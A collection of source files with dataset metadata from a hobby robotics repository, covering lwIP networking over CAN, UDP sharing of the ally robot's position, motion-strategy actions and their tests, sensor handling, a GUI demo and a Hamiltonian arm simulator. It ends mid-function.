"text": "#include \"can_uwb_ip_netif.hpp\"\n\n#include <ch.h>\n#include <hal.h>\n\n#include <cvra/uwb_beacon/DataPacket.hpp>\n\n#include <lwip/opt.h>\n#include <lwip/def.h>\n#include <lwip/mem.h>\n#include <lwip/pbuf.h>\n#include <lwip/sys.h>\n#include <lwip/stats.h>\n#include <lwip/snmp.h>\n#include <lwip/tcpip.h>\n#include <netif/etharp.h>\n#include <lwip/netifapi.h>\n\n#if LWIP_DHCP\n#include <lwip/dhcp.h>\n#endif\nusing DataPacket = cvra::uwb_beacon::DataPacket;\n\n/* Semaphores synchronizing communication between the lwip thread and the\n * UAVCAN thread. */\nstatic BSEMAPHORE_DECL(sem_tx_ready, true);\nstatic BSEMAPHORE_DECL(sem_tx_done, true);\n\nstatic DataPacket tx_packet, rx_packet;\n\nstatic MUTEX_DECL(lock_rx_packet);\nstatic BSEMAPHORE_DECL(sem_rx_available, true);\nstatic EVENTSOURCE_DECL(event_rx);\n\nstatic uavcan::LazyConstructor<uavcan::Publisher<DataPacket>> data_pub;\n\nstatic err_t low_level_output(struct netif* netif, struct pbuf* p);\n\nstatic void data_packet_cb(const uavcan::ReceivedDataStructure<DataPacket>& msg)\n{\n chMtxLock(&lock_rx_packet);\n rx_packet = msg;\n chMtxUnlock(&lock_rx_packet);\n chBSemSignal(&sem_rx_available);\n\n /* Wakes up IP thread */\n chEvtBroadcast(&event_rx);\n}\n\nerr_t lwip_uwb_ip_netif_init(struct netif* interface)\n{\n osalDbgAssert((interface != NULL), \"netif != NULL\");\n interface->state = NULL;\n interface->name[0] = 'w';\n interface->name[1] = 'l';\n\n /* Must be smaller than 1k */\n interface->mtu = 750;\n interface->hwaddr_len = ETHARP_HWADDR_LEN;\n interface->flags = NETIF_FLAG_BROADCAST | NETIF_FLAG_ETHARP | NETIF_FLAG_LINK_UP;\n\n interface->output = etharp_output;\n interface->linkoutput = low_level_output;\n\n return ERR_OK;\n}\n\nint can_uwb_ip_netif_init(uavcan::INode& node)\n{\n static uavcan::Subscriber<DataPacket> subscriber(node);\n data_pub.construct<uavcan::INode&>(node);\n\n return subscriber.start(data_packet_cb);\n}\n\nstatic err_t low_level_output(struct netif* netif, struct pbuf* p)\n{\n (void)netif;\n /* First, copy all the data */\n tx_packet = DataPacket();\n for (auto q = p; q != NULL; q = q->next) {\n uint8_t* buf = reinterpret_cast<uint8_t*>(q->payload);\n for (auto i = 0u; i < q->len; i++) {\n tx_packet.data.push_back(buf[i]);\n }\n }\n\n /* Signal the UAVCAN thread that a DataPacket is ready */\n chBSemSignal(&sem_tx_ready);\n\n /* Finally, wait for the UAVCAN to tell us we are ready. */\n chBSemSignal(&sem_tx_done);\n\n return ERR_OK;\n}\n\nbool lwip_uwb_ip_read(struct netif* netif, struct pbuf** pbuf)\n{\n (void)netif;\n if (chBSemWaitTimeout(&sem_rx_available, TIME_IMMEDIATE) != MSG_OK) {\n return false;\n }\n\n chMtxLock(&lock_rx_packet);\n\n auto len = rx_packet.data.size();\n *pbuf = pbuf_alloc(PBUF_RAW, len, PBUF_POOL);\n\n auto can_msg_index = 0u;\n\n for (auto q = *pbuf; q != NULL; q = q->next) {\n uint8_t* buf = reinterpret_cast<uint8_t*>(q->payload);\n for (auto j = 0u; j < q->len; j++) {\n buf[j] = rx_packet.data[can_msg_index];\n can_msg_index++;\n }\n }\n\n chMtxUnlock(&lock_rx_packet);\n\n return true;\n}\n\nint can_uwb_ip_netif_spin(uavcan::INode& node)\n{\n (void)node;\n /* Check if data is available for transmit */\n if (chBSemWaitTimeout(&sem_tx_ready, TIME_IMMEDIATE) == MSG_OK) {\n data_pub->broadcast(tx_packet);\n\n /* Signal the lwip thread that we are done with this. */\n chBSemSignal(&sem_tx_done);\n }\n\n return 0;\n}\n\nevent_source_t* can_uwb_ip_netif_get_event_source(void)\n{\n return &event_rx;\n}\n"
},
{
"alpha_fraction": 0.6312292218208313,
"alphanum_fraction": 0.6384778022766113,
"avg_line_length": 27.059322357177734,
"blob_id": "dc3c44db8aea70831bda70f4238a28224d0a9f02",
"content_id": "ac6dde254817cd6dd2074d2b0e49efc3404489a3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3311,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 118,
"path": "/master-firmware/src/ally_position_service.c",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <lwip/api.h>\n#include <msgbus_protobuf.h>\n#include \"protobuf/ally_position.pb.h\"\n#include <pb_encode.h>\n#include <pb_decode.h>\n#include \"base/base_controller.h\"\n#include \"ally_position_service.h\"\n\n#include <parameter/parameter.h>\n#include \"main.h\"\n#include \"control_panel.h\"\n\n#define ALLY_POSITION_PORT 3000\n\nstatic parameter_t ally_ip;\nchar ally_ip_buffer[IP4ADDR_STRLEN_MAX];\n\nstatic int ip_from_parameter(parameter_t* p, ip4_addr_t* addr)\n{\n char buffer[IP4ADDR_STRLEN_MAX];\n parameter_string_get(p, buffer, sizeof(buffer));\n int success = ip4addr_aton(buffer, addr);\n if (success == 0) {\n WARNING(\"\\\"%s\\\" is not a valid IP.\", buffer);\n }\n\n return success;\n}\n\nstatic void position_send_thread(void* p)\n{\n (void)p;\n\n chRegSetThreadName(__FUNCTION__);\n\n struct netconn* conn;\n conn = netconn_new(NETCONN_UDP);\n\n static uint8_t object_buf[AllyPosition_size];\n\n while (true) {\n AllyPosition pos;\n struct netbuf* buf;\n pb_ostream_t stream;\n\n pos.x = position_get_x_float(&robot.pos);\n pos.y = position_get_y_float(&robot.pos);\n pos.a = position_get_a_rad_float(&robot.pos);\n\n /* Encode the message as Protobuf and send it */\n stream = pb_ostream_from_buffer(object_buf, sizeof(object_buf));\n pb_encode(&stream, AllyPosition_fields, &pos);\n\n buf = netbuf_new();\n\n netbuf_ref(buf, object_buf, sizeof(object_buf));\n\n /* TODO: Take that from parameter tree */\n ip_addr_t addr;\n if (parameter_defined(&ally_ip)) {\n ip_from_parameter(&ally_ip, &addr);\n\n netconn_sendto(conn, buf, &addr, ALLY_POSITION_PORT);\n }\n netbuf_delete(buf);\n\n /* Publish at 10 Hz */\n chThdSleepMilliseconds(100);\n }\n}\n\nTOPIC_DECL(ally_position_topic, AllyPosition);\n\nstatic void position_receive_thread(void* p)\n{\n (void)p;\n chRegSetThreadName(__FUNCTION__);\n\n struct netconn* conn;\n\n messagebus_advertise_topic(&bus, &ally_position_topic.topic, \"/ally_pos\");\n\n conn = netconn_new(NETCONN_UDP);\n chDbgAssert(conn != NULL, \"Cannot create a connection object\");\n netconn_bind(conn, IPADDR_ANY, ALLY_POSITION_PORT);\n\n while (true) {\n struct netbuf* buf;\n static uint8_t pos_buf[AllyPosition_size];\n AllyPosition pos;\n pb_istream_t istream;\n\n /* Read a datagram */\n if (netconn_recv(conn, &buf) != ERR_OK) {\n continue;\n }\n\n netbuf_copy(buf, &pos_buf, sizeof(pos_buf));\n\n istream = pb_istream_from_buffer(pos_buf, sizeof(pos_buf));\n pb_decode(&istream, AllyPosition_fields, &pos);\n\n control_panel_toggle(LED_READY);\n messagebus_topic_publish(&ally_position_topic.topic, &pos, sizeof(pos));\n\n netbuf_delete(buf);\n }\n}\n\nvoid ally_position_start(void)\n{\n static THD_WORKING_AREA(send_wa, 2048);\n static THD_WORKING_AREA(receive_wa, 2048);\n parameter_namespace_t* ip_ns = parameter_namespace_find(&global_config, \"/ip\");\n parameter_string_declare(&ally_ip, ip_ns, \"ally_address\", ally_ip_buffer, sizeof(ally_ip_buffer));\n chThdCreateStatic(send_wa, sizeof(send_wa), NORMALPRIO, position_send_thread, NULL);\n chThdCreateStatic(receive_wa, sizeof(receive_wa), NORMALPRIO, position_receive_thread, NULL);\n}\n"
},
{
"alpha_fraction": 0.5731584429740906,
"alphanum_fraction": 0.5817356109619141,
"avg_line_length": 21.522727966308594,
"blob_id": "a28a845a77cc9b039b5dadf6811c3e28681d4b7a",
"content_id": "6c116c982c34613b9bbfa56ae3c74107f317d2a6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1982,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 88,
"path": "/ugfx_demo/main.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include \"gfx.h\"\n#include \"gui/Menu.h\"\n#include \"gui/MenuPage.h\"\n#include \"gui/Page.h\"\n#include <string.h>\n#include <iostream>\n\nclass TestPage : public Page {\n GHandle button;\n const char* name;\n int counter;\n\npublic:\n TestPage(const char* name)\n : Page()\n , name(name)\n , counter(0)\n {\n }\n\n virtual const char* get_name()\n {\n return name;\n }\n\n virtual void on_enter(GHandle parent)\n {\n GWidgetInit wi;\n\n gwinWidgetClearInit(&wi);\n\n wi.g.show = gTrue;\n wi.g.parent = parent;\n wi.g.width = 100;\n wi.g.height = 50;\n wi.g.y = 10;\n wi.g.x = 5;\n button = gwinLabelCreate(0, &wi);\n gwinSetText(button, \"foobar\", gFalse);\n }\n\n virtual void on_timer()\n {\n char msg[30];\n sprintf(msg, \"x: %02d\", counter);\n counter++;\n gwinSetText(button, msg, gTrue);\n }\n\n virtual void on_event(GEvent* event)\n {\n std::cout << \"click\" << std::endl;\n }\n};\n\nint main(int argc, char* argv[])\n{\n (void)argc;\n (void)argv;\n\n gfxInit();\n gdispClear(GFX_SILVER);\n gwinSetDefaultBgColor(GFX_SILVER);\n\n gwinSetDefaultFont(gdispOpenFont(\"DejaVuSans32\"));\n\n Menu m;\n\n auto move_page = TestPage(\"move\");\n auto odometry_page = TestPage(\"odometry\");\n auto autoposition = TestPage(\"autoposition\");\n auto base_menu = MenuPage(m, \"Base\", &move_page, &odometry_page, &autoposition);\n\n auto index_page = TestPage(\"index\");\n auto pickup_puck = TestPage(\"pickup\");\n auto arm_menu = MenuPage(m, \"Arms\", &index_page, &pickup_puck);\n\n auto align_page = TestPage(\"puck_align\");\n auto pickup_action = TestPage(\"puck_pickup\");\n auto actions = MenuPage(m, \"Actions\", &align_page, &pickup_action);\n auto strat_menu = MenuPage(m, \"Strat\", &actions);\n\n auto root_page = MenuPage(m, \"Robot\", &strat_menu, &base_menu, &arm_menu);\n m.enter_page(&root_page);\n m.event_loop();\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6539682745933533,
"alphanum_fraction": 0.7214285731315613,
"avg_line_length": 24.200000762939453,
"blob_id": "3cb8a3dd5f7d99651f5f94d0abd666c1490a36a3",
"content_id": "c96997fa2c94192fd47b1657e58ddb9c8c36ecbd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1260,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 50,
"path": "/master-firmware/src/lwipopts.h",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "/**\n * @file\n *\n * lwIP Options Configuration\n */\n\n#ifndef __LWIPOPT_H__\n#define __LWIPOPT_H__\n\n#include \"priorities.h\"\n\n#define LWIP_DBG_TYPES_ON LWIP_DBG_ON\n#define LWIP_COMPAT_MUTEX_ALLOWED\n\n/* Disabling TCP reduces flash usage by aout 27 kB.*/\n#define LWIP_TCP 0\n\n/* See lwip/src/include/lwip/opt.h for reference. */\n\n#define MEM_ALIGNMENT 4\n\n#define TCPIP_THREAD_STACKSIZE 4096\n#define TCPIP_MBOX_SIZE MEMP_NUM_PBUF\n\n#define LWIP_SOCKET 0\n\n#define DEFAULT_THREAD_STACK_SIZE 4096\n#define DEFAULT_RAW_RECVMBOX_SIZE 4\n#define DEFAULT_UDP_RECVMBOX_SIZE 4\n#define DEFAULT_TCP_RECVMBOX_SIZE 4\n#define DEFAULT_ACCEPTMBOX_SIZE 4\n\n/* Deprecated, use parameter instead */\n/* Set the default IP of each interface */\n#define LWIP_ETHERNET_IPADDR(p) IP4_ADDR(p, 192, 168, 3, 20)\n#define LWIP_ETHERNET_NETMASK(p) IP4_ADDR(p, 255, 255, 255, 0)\n#define LWIP_CAN_IPADDR(p) IP4_ADDR(p, 192, 168, 4, 20)\n#define LWIP_CAN_NETMASK(p) IP4_ADDR(p, 255, 255, 255, 0)\n#define LWIP_GATEWAY(p) IP4_ADDR(p, 192, 168, 3, 1)\n\n/** Use newlib malloc() instead of memory pools. */\n#include <stdlib.h>\n#define MEM_LIBC_MALLOC 1\n#define MEMP_MEM_MALLOC 1\n\n#define ODOMETRY_PUBLISHER_PORT 20042\n#define STREAM_PORT 20042\n#define BUTTON_PRESS_PUBLISHER_PORT 20042\n\n#endif /* __LWIPOPT_H__ */\n"
},
{
"alpha_fraction": 0.664893627166748,
"alphanum_fraction": 0.6702127456665039,
"avg_line_length": 15.588234901428223,
"blob_id": "493aeea4fa6021853b5afa4ce0268b8447ea77ce",
"content_id": "d58368e53121764f66d8aa221830800bb741b6cc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 564,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 34,
"path": "/master-firmware/src/parameter_port.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <cstdlib>\n#include <error/error.h>\n#include <mutex>\n#include <parameter/parameter_port.h>\n\nstatic std::mutex parameter_lock;\n\nvoid parameter_port_lock(void)\n{\n parameter_lock.lock();\n}\n\nvoid parameter_port_unlock(void)\n{\n parameter_lock.unlock();\n}\n\nvoid parameter_port_assert(int condition)\n{\n if (!condition) {\n ERROR(\"parameter_assert()\");\n }\n}\n\nvoid* parameter_port_buffer_alloc(size_t size)\n{\n return new uint8_t[size];\n}\n\nvoid parameter_port_buffer_free(void* buffer)\n{\n uint8_t* ptr = (uint8_t*)buffer;\n delete[] ptr;\n}\n"
},
{
"alpha_fraction": 0.577375590801239,
"alphanum_fraction": 0.5933635234832764,
"avg_line_length": 24.8984375,
"blob_id": "3611adf28ebb990f8a9f6d8cab08a0926ee98235",
"content_id": "a02f4a7e74ca2468c4fa5f7bc8e48c3a8a745ddc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3315,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 128,
"path": "/master-firmware/src/strategy/actions_impl.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <error/error.h>\n#include \"actions.h\"\n#include \"robot_helpers/trajectory_helpers.h\"\n\nbool actions::EnableLighthouse::execute(StrategyState& state)\n{\n (void)state;\n NOTICE(\"Enabling the lighthouse\");\n\n int res;\n\n // Go in front of lighthouse\n NOTICE(\"Going to the lighthouse\");\n {\n absl::MutexLock l(&robot.lock);\n trajectory_goto_forward_xy_abs(&robot.traj, 525, 300);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not go to lighthouse: %d\", res);\n return false;\n }\n\n // We go backward to avoid bringing any glasses with us\n {\n absl::MutexLock l(&robot.lock);\n trajectory_goto_backward_xy_abs(&robot.traj, 225, 400);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not go to lighthouse: %d\", res);\n return false;\n }\n\n NOTICE(\"Turning toward lighthouse\");\n {\n absl::MutexLock l(&robot.lock);\n trajectory_a_abs(&robot.traj, -90);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not turn to lighthouse: %d\", res);\n return false;\n }\n\n {\n absl::MutexLock l(&robot.lock);\n trajectory_d_rel(&robot.traj, 300);\n }\n trajectory_wait_for_end(TRAJ_FLAGS_SHORT_DISTANCE);\n\n if (position_get_y_double(&robot.pos) > 150) {\n WARNING(\"Could not get close enough to trigger lighthouse...\");\n return false;\n }\n\n NOTICE(\"Lighthouse succesfully turned on\");\n state.lighthouse_is_on = true;\n\n {\n absl::MutexLock l(&robot.lock);\n trajectory_d_rel(&robot.traj, -200);\n }\n trajectory_wait_for_end(TRAJ_FLAGS_SHORT_DISTANCE);\n\n return true;\n}\n\nbool actions::RaiseWindsock::execute(StrategyState& state)\n{\n (void)state;\n NOTICE(\"Raising windsock #%d\", windsock_index);\n\n int windsock_x;\n int res;\n\n if (windsock_index == 0) {\n windsock_x = 2770;\n } else {\n windsock_x = 2365;\n }\n\n // TODO: Use proper obstacle avoidance instead\n {\n absl::MutexLock l(&robot.lock);\n trajectory_goto_xy_abs(&robot.traj, windsock_x - 100, 1500);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not go to windsock!\");\n return false;\n }\n\n {\n absl::MutexLock l(&robot.lock);\n trajectory_goto_xy_abs(&robot.traj, windsock_x - 100, 2000 - 150);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not go to windsock!\");\n return false;\n }\n\n {\n absl::MutexLock l(&robot.lock);\n trajectory_a_abs(&robot.traj, 0);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not turn to windsock\");\n return false;\n }\n\n {\n absl::MutexLock l(&robot.lock);\n trajectory_d_rel(&robot.traj, 200);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not move windsock\");\n return false;\n }\n\n state.windsocks_are_up[windsock_index] = true;\n\n return true;\n}\n"
},
{
"alpha_fraction": 0.5853285789489746,
"alphanum_fraction": 0.5858380198478699,
"avg_line_length": 23.848100662231445,
"blob_id": "a07d49716750e7ae88d24edf6b04f1b1a85abdef",
"content_id": "156d7eaa65d0fd2137448f1182ed0dcc16e8395b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1963,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 79,
"path": "/eurobot/arm-simulator/arm_simulator/hamilton.py",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "from copy import deepcopy\n\nimport autograd.numpy as np\nfrom autograd import grad, hessian, jacobian\n\n\nclass System:\n \"\"\"\n Dynamic system simulated using Hamiltonian dynamics and automatic differentiation\n\n Dimensions:\n - m: Cartesian coordinates\n - n: generalized coordinates (proportional to number of degrees of freedom)\n\n Parameters:\n - f: mapping from generalized to Cartesian coordinates [n -> m]\n - M: inertia matrix of the system, expressed in Cartesian coordinates [m * m]\n - U: potential energy of the system as function of generalized coordinates [n -> 1]\n \"\"\"\n\n def __init__(self, f, M, U):\n self.f = f\n self.M = M\n self.U = U\n\n self.J_f = jacobian(f)\n self.H_f = hessian(f)\n self.grad_U = grad(U)\n\n \"\"\"\n Reset the position and velocity\n \"\"\"\n\n def reset(self, q, qdot):\n self.q = q\n self.p = self.K(q) @ qdot\n\n \"\"\"\n Inertia matrix expressed in generalized coordinates\n \"\"\"\n\n def K(self, q):\n return self.J_f(q).T @ self.M @ self.J_f(q)\n\n \"\"\"\n Time-derivative of the generalized coordinates\n \"\"\"\n\n def q_dot(self, p, q):\n return np.linalg.inv(self.K(q)) @ p\n\n \"\"\"\n Time-derivative of the conjugate momenta\n \"\"\"\n\n def p_dot(self, p, q):\n return p.T @ np.linalg.inv(self.K(q)) @ self.H_f(q).T @ self.M @ self.J_f(\n q\n ) @ np.linalg.inv(self.K(q)) @ p - self.grad_U(q)\n\n \"\"\"\n Advance the system through the given time step\n Returns the resulting generalized coordinates and conjugate momenta\n \"\"\"\n\n def step(self, dt):\n dq = self.q_dot(self.p, self.q)\n self.q += dt * dq\n\n dp = self.p_dot(self.p, self.q)\n self.p += dt * dp\n\n \"\"\"\n Query the current state of the system, returns generalized coordinate q\n and conjugate momenta p\n \"\"\"\n\n def state(self):\n return deepcopy(self.p), deepcopy(self.q)\n"
},
{
"alpha_fraction": 0.7247474789619446,
"alphanum_fraction": 0.7247474789619446,
"avg_line_length": 21,
"blob_id": "f92f464b49237877b3fc705ef224c4e0c3011b34",
"content_id": "ba664ef76e9c881dd117fdf91010df98dbadeb00",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 792,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 36,
"path": "/master-firmware/src/strategy/actions_goap.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "/* File containing the GOAP parts for the actions.\n *\n * The parts specific to the robot, which actually moves the robot and so on\n * should go to actions_impl.cpp\n */\n\n#include \"actions.h\"\n\nusing namespace actions;\n\nbool EnableLighthouse::can_run(const StrategyState& state)\n{\n (void)state;\n return true;\n}\n\nvoid EnableLighthouse::plan_effects(StrategyState& state)\n{\n state.lighthouse_is_on = true;\n}\n\nRaiseWindsock::RaiseWindsock(int windsock_index)\n : windsock_index(windsock_index)\n{\n}\n\nbool RaiseWindsock::can_run(const StrategyState& state)\n{\n /* We don't want to retry a windsock which is already up. */\n return !state.windsocks_are_up[windsock_index];\n}\n\nvoid RaiseWindsock::plan_effects(StrategyState& state)\n{\n state.windsocks_are_up[windsock_index] = true;\n}\n"
},
{
"alpha_fraction": 0.7043931484222412,
"alphanum_fraction": 0.70960533618927,
"avg_line_length": 20.317461013793945,
"blob_id": "ee354d771c6d3f3d7fcdab4aef6e899436a1040c",
"content_id": "80bd2156317ec1a0a7e3fd5418aeaca0841c154b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1343,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 63,
"path": "/master-firmware/tests/strategy/test_actions.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <CppUTest/TestHarness.h>\n#include \"strategy/actions.h\"\n\nusing namespace actions;\n\nbool EnableLighthouse::execute(StrategyState& state)\n{\n plan_effects(state);\n return true;\n}\n\nTEST_GROUP (EnableLighthouseTestCase) {\n StrategyState state;\n EnableLighthouse action;\n};\n\nTEST(EnableLighthouseTestCase, CanAlwaysRun)\n{\n CHECK_TRUE(action.can_run(state));\n}\n\nTEST(EnableLighthouseTestCase, EnablesTheLightHouse)\n{\n action.plan_effects(state);\n CHECK_TRUE(state.lighthouse_is_on);\n}\n\nbool RaiseWindsock::execute(StrategyState& state)\n{\n plan_effects(state);\n return true;\n}\n\nTEST_GROUP (RaiseWindsockTestCase) {\n StrategyState state;\n RaiseWindsock far{1}, near{0};\n};\n\nTEST(RaiseWindsockTestCase, FarSockConditions)\n{\n state.windsocks_are_up[1] = false;\n CHECK_TRUE(far.can_run(state));\n\n /* We should not retry a windsock, its dangerous */\n state.windsocks_are_up[1] = true;\n CHECK_FALSE(far.can_run(state));\n}\n\nTEST(RaiseWindsockTestCase, NearSockConditions)\n{\n state.windsocks_are_up[0] = false;\n CHECK_TRUE(near.can_run(state));\n\n /* We should not retry a windsock, its dangerous */\n state.windsocks_are_up[0] = true;\n CHECK_FALSE(near.can_run(state));\n}\n\nTEST(RaiseWindsockTestCase, RaisesSock)\n{\n far.plan_effects(state);\n CHECK_TRUE(state.windsocks_are_up[1]);\n}\n"
},
{
"alpha_fraction": 0.6775751113891602,
"alphanum_fraction": 0.6861587762832642,
"avg_line_length": 34.846153259277344,
"blob_id": "89ec8fbbeb5e8379dd4f46080a852fad89323fdf",
"content_id": "b4bf0ccdb01c83e0fb0c47f2b87393b4e2050deb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1864,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 52,
"path": "/master-firmware/src/can/sensor_handler.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <ch.h>\n#include <uavcan/uavcan.hpp>\n#include <cvra/sensor/DistanceVL6180X.hpp>\n\n#include <error/error.h>\n#include \"main.h\"\n#include \"protobuf/sensors.pb.h\"\n#include <msgbus_protobuf.h>\n\nstatic TOPIC_DECL(front_left_topic, Range);\nstatic TOPIC_DECL(front_right_topic, Range);\nstatic TOPIC_DECL(back_left_topic, Range);\nstatic TOPIC_DECL(back_right_topic, Range);\n\nstatic bus_enumerator_t* enumerator;\n\nstatic void sensor_distance_cb(const uavcan::ReceivedDataStructure<cvra::sensor::DistanceVL6180X>& msg)\n{\n int id = msg.getSrcNodeID().get();\n messagebus_topic_t* topic = NULL;\n\n if (id == bus_enumerator_get_can_id(enumerator, \"front-left-sensor\")) {\n topic = &front_left_topic.topic;\n } else if (id == bus_enumerator_get_can_id(enumerator, \"front-right-sensor\")) {\n topic = &front_right_topic.topic;\n } else if (id == bus_enumerator_get_can_id(enumerator, \"back-left-sensor\")) {\n topic = &back_left_topic.topic;\n } else if (id == bus_enumerator_get_can_id(enumerator, \"back-right-sensor\")) {\n topic = &back_right_topic.topic;\n }\n\n if (topic) {\n Range dist;\n dist.distance = msg.distance_mm / 1000.f;\n dist.type = Range_RangeType_LASER;\n messagebus_topic_publish(topic, &dist, sizeof(dist));\n }\n}\n\nint sensor_handler_init(uavcan::INode& node, bus_enumerator_t* e)\n{\n enumerator = e;\n\n messagebus_advertise_topic(&bus, &front_left_topic.topic, \"/distance/front_left\");\n messagebus_advertise_topic(&bus, &front_right_topic.topic, \"/distance/front_right\");\n messagebus_advertise_topic(&bus, &back_left_topic.topic, \"/distance/back_left\");\n messagebus_advertise_topic(&bus, &back_right_topic.topic, \"/distance/back_right\");\n\n static uavcan::Subscriber<cvra::sensor::DistanceVL6180X> distance_sub(node);\n\n return distance_sub.start(sensor_distance_cb);\n}\n"
},
{
"alpha_fraction": 0.6012872457504272,
"alphanum_fraction": 0.6058604121208191,
"avg_line_length": 28.22772216796875,
"blob_id": "6b7dfda093877020e92dead86b165579fed5f9ee",
"content_id": "a166ff544f022f74326594f11b48eedaf6eab4f3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5904,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 202,
"path": "/strategy_simulator/msgbus_port.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include \"msgbus_port.h\"\n\n#include \"protobuf/protocol.pb.h\"\n#include <pb_encode.h>\n#include <pb_decode.h>\n#include <msgbus/messagebus.h>\n\nvoid messagebus_lock_acquire(void* p)\n{\n condvar_wrapper_t* wrapper = (condvar_wrapper_t*)p;\n pthread_mutex_lock(&wrapper->mutex);\n}\n\nvoid messagebus_lock_release(void* p)\n{\n condvar_wrapper_t* wrapper = (condvar_wrapper_t*)p;\n pthread_mutex_unlock(&wrapper->mutex);\n}\n\nvoid messagebus_condvar_broadcast(void* p)\n{\n condvar_wrapper_t* wrapper = (condvar_wrapper_t*)p;\n pthread_cond_broadcast(&wrapper->cond);\n}\n\nvoid messagebus_condvar_wait(void* p)\n{\n condvar_wrapper_t* wrapper = (condvar_wrapper_t*)p;\n pthread_cond_wait(&wrapper->cond, &wrapper->mutex);\n}\n\n/** Encodes a given topic's header in the buffer and returns the size.\n *\n * @note returns zero if there was an error.\n */\nstatic size_t encode_topic_header(const messagebus_topic_t* topic, uint8_t* buf, size_t buf_len);\n\n/** Encode a given's topic body in the buffer and returns the size. Uses the\n * provided scratch buffer to hold the topic content while it is being\n * processed.\n *\n * @returns encoded size or zero if there was an error.\n */\nstatic size_t encode_topic_body(messagebus_topic_t* topic,\n uint8_t* buf,\n size_t buf_len,\n uint8_t* scratch,\n size_t scratch_len);\n\nsize_t messagebus_encode_topic_message(messagebus_topic_t* topic,\n uint8_t* buf,\n size_t buf_len,\n uint8_t* scratch,\n size_t scratch_len)\n{\n size_t header_len, body_len;\n\n header_len = encode_topic_header(topic, buf, buf_len);\n\n if (!header_len) {\n return 0;\n }\n\n body_len = encode_topic_body(topic, &buf[header_len], buf_len - header_len,\n scratch, scratch_len);\n\n if (!body_len) {\n return 0;\n }\n\n return header_len + body_len;\n}\n\nvoid messagebus_inject_encoded_message(messagebus_t* bus, uint8_t* buf, size_t len)\n{\n size_t offset = 0;\n pb_istream_t istream;\n messagebus_topic_t* topic;\n\n /* TODO check for out of bounds access */\n (void)len;\n\n /* Get header size */\n istream = pb_istream_from_buffer(buf + offset, MessageSize_size);\n MessageSize header_size;\n if (!pb_decode(&istream, MessageSize_fields, &header_size)) {\n return;\n }\n\n /* Get header */\n TopicHeader header;\n offset = MessageSize_size;\n istream = pb_istream_from_buffer(buf + offset, header_size.bytes);\n if (!pb_decode(&istream, TopicHeader_fields, &header)) {\n return;\n }\n\n topic = messagebus_find_topic(bus, header.name);\n if (topic == NULL) {\n return;\n }\n\n /* Read message size */\n MessageSize msg_size;\n offset = MessageSize_size + header_size.bytes;\n istream = pb_istream_from_buffer(buf + offset, MessageSize_size);\n if (!pb_decode(&istream, MessageSize_fields, &msg_size)) {\n return;\n }\n\n /* Read message */\n offset = 2 * MessageSize_size + header_size.bytes;\n istream = pb_istream_from_buffer(buf + offset, msg_size.bytes);\n\n /* TODO better approach than just a static buffer. */\n static uint8_t obj_buffer[1024];\n topic_metadata_t* metadata = (topic_metadata_t*)topic->metadata;\n if (!pb_decode(&istream, metadata->fields, obj_buffer)) {\n return;\n }\n\n messagebus_topic_publish(topic, obj_buffer, topic->buffer_len);\n}\n\nstatic size_t encode_topic_header(const messagebus_topic_t* topic, uint8_t* buf, size_t buf_len)\n{\n topic_metadata_t* metadata = 